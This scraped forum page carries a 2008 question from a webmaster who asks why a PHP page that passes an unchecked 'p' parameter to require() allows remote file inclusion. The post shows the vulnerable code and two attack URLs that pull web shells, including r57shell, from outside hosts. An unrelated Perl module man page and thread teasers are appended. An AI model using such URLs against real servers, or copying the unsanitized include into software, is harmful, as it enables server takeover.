Sponsored Content
Top Forums Shell Programming and Scripting php http exploit method - pbsync hack question Post 302239668 by phpfreak on Wednesday 24th of September 2008 07:58:40 AM
Old 09-24-2008
exploit method - pbsync hack question

I'm dealing with a website that was recently blocked by the webhost because pbsync was found on the server. I'd like for someone to give me 'a tutorial' if you will or guidance on how they are able to accomplish the below scenario..

index.php consist primarily of these tables with the following code:

Code:
  <tbody>

    <tr align="left">

      <td style="height: 100px;" colspan="2" rowspan="1">
        <a name="top"></a>
        <? require("top.html"); ?>
        </td>

    </tr>

    <tr>

      <td style="width: 150px;" align="left" valign="top">
        <? require("menu.html"); ?>
        </td>

        <?
        $_GET['p']=$p;
        if ($_GET['p']==NULL)
        {
          $p="accueil.html";
        }
        ?>
      <td style="width: 550px;" align="left" valign="top">

<table style="text-align: left; width: 100%;" border="0"
 cellpadding="2" cellspacing="2">
  <tbody>
    <tr>
      <td>

       <? require($p); ?>

        <br>
        <div align="right"><a href="#top">Haut de page</a></div>

        </td>
    </tr>
  </tbody>

^^Somehow because of this, the site is completely exploitable to requests like...


Code:
http://x.x.x.x/index.php?p=http://www.myrentaldesk.com/vote-pro/readme.txt??

&
Code:
http://x.x.x.x/index.php?p=http://almeriastay.com/images/r57.txt


^^Basically with the above, the site is completely vulnerable to malicious scripts on the net!! I found the first to be a web face to run shell commands on the server, and the second to be r57shell 1.3.

I'd like to know, with the code shown above, what method is being used to allow for this type of an exploit and how can it be re-written to prevent it? I'm sure this is method is logged somewhere on the php.net but I'm not sure what the exact term is for the scripting method used. All I know is that it seems that they are using frames through php script and it's exploitable with the right URL request.

Please, any feedback would be appreciated.

Last edited by phpfreak; 09-24-2008 at 09:09 AM..
 

6 More Discussions You Might Find Interesting

1. IP Networking

Wireshark TCP and HTTP question.

Hello all. This is my first post and thank you for your forum. Here is my question. I have a simple setup at home and I was capturing some data with wireshark. Data between a workstation and the web server, requesting a page. Simple enough. Now when I open wireshark, I apply the TCP... (4 Replies)
Discussion started by: squaresphere
4 Replies

2. Shell Programming and Scripting

sending http url through http socket programming..

hi am senthil am developing a software to send and receive SMS using HTTP connection first of all am forming a URL and sending that URL to a remote server using my Client Program i send that url through Socket(using Send() Function) if i send more than one URL one by one using the same... (4 Replies)
Discussion started by: senkerth
4 Replies

3. Programming

Need a help in automating the http authenticated web page - via PHP scripting

Hi all, Need a help in PHP scripting. Am automating a process in web page. The process is 1. i have to open that web page using the user credentials (Username and password). 2. select a drop down and click submit button. 3. Then check for the status of the page. Please help me how to... (1 Reply)
Discussion started by: vidhyaS
1 Replies

4. Web Development

HTTP Headers Reference: HTTP Status-Codes

Hypertext Transfer Protocol -- HTTP/1.1 for Reference - HTTP Headers 10 Status Code Definitions Each Status-Code is described below, including a description of which method(s) it can follow and any metainformation required in the response. (1 Reply)
Discussion started by: Neo
1 Replies

5. Solaris

HTTP Debugging Method

Hi, I need to disable HTTPD debugging method in one server. I added the entry 'TraceEnable off' in /etc/apache/httpd.conf. I restart httpd for the changes to take effect, however I realize now that httpd is actually 'disabled'. When I try to enable httpd, it shows the status as being in... (1 Reply)
Discussion started by: anaigini45
1 Replies

6. Shell Programming and Scripting

awk script to find time difference between HTTP PUT and HTTP DELETE requests in access.log

Hi, I'm trying to write a script to determine the time gap between HTTP PUT and HTTP DELETE requests in the HTTP Servers access log. Normally client will do HTTP PUT to push content e.g. file_1.txt and 21 seconds later it will do HTTP DELETE, but sometimes the time varies causing some issues... (3 Replies)
Discussion started by: Juha
3 Replies
Locale::Codes::LangFam(3)				User Contributed Perl Documentation				 Locale::Codes::LangFam(3)

NAME
Locale::Codes::LangFam - standard codes for language extension identification SYNOPSIS
use Locale::Codes::LangFam; $lext = code2langfam('apa'); # $lext gets 'Apache languages' $code = langfam2code('Apache languages'); # $code gets 'apa' @codes = all_langfam_codes(); @names = all_langfam_names(); DESCRIPTION
The "Locale::Codes::LangFam" module provides access to standard codes used for identifying language families, such as those as defined in ISO 639-5. Most of the routines take an optional additional argument which specifies the code set to use. If not specified, the default ISO 639-5 language family codes will be used. SUPPORTED CODE SETS
There are several different code sets you can use for identifying language families. A code set may be specified using either a name, or a constant that is automatically exported by this module. For example, the two are equivalent: $lext = code2langfam('apa','alpha'); $lext = code2langfam('apa',LOCALE_LANGFAM_ALPHA); The codesets currently supported are: alpha This is the set of three-letter (lowercase) codes from ISO 639-5 such as 'apa' for Apache languages. This is the default code set. ROUTINES
code2langfam ( CODE [,CODESET] ) langfam2code ( NAME [,CODESET] ) langfam_code2code ( CODE ,CODESET ,CODESET2 ) all_langfam_codes ( [CODESET] ) all_langfam_names ( [CODESET] ) Locale::Codes::LangFam::rename_langfam ( CODE ,NEW_NAME [,CODESET] ) Locale::Codes::LangFam::add_langfam ( CODE ,NAME [,CODESET] ) Locale::Codes::LangFam::delete_langfam ( CODE [,CODESET] ) Locale::Codes::LangFam::add_langfam_alias ( NAME ,NEW_NAME ) Locale::Codes::LangFam::delete_langfam_alias ( NAME ) Locale::Codes::LangFam::rename_langfam_code ( CODE ,NEW_CODE [,CODESET] ) Locale::Codes::LangFam::add_langfam_code_alias ( CODE ,NEW_CODE [,CODESET] ) Locale::Codes::LangFam::delete_langfam_code_alias ( CODE [,CODESET] ) These routines are all documented in the Locale::Codes::API man page. SEE ALSO
Locale::Codes The Locale-Codes distribution. Locale::Codes::API The list of functions supported by this module. http://www.loc.gov/standards/iso639-5/id.php ISO 639-5 . AUTHOR
See Locale::Codes for full author history. Currently maintained by Sullivan Beck (sbeck@cpan.org). COPYRIGHT
Copyright (c) 2011-2013 Sullivan Beck This module is free software; you can redistribute it and/or modify it under the same terms as Perl itself. perl v5.16.3 2013-02-27 Locale::Codes::LangFam(3)
All times are GMT -4. The time now is 03:40 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy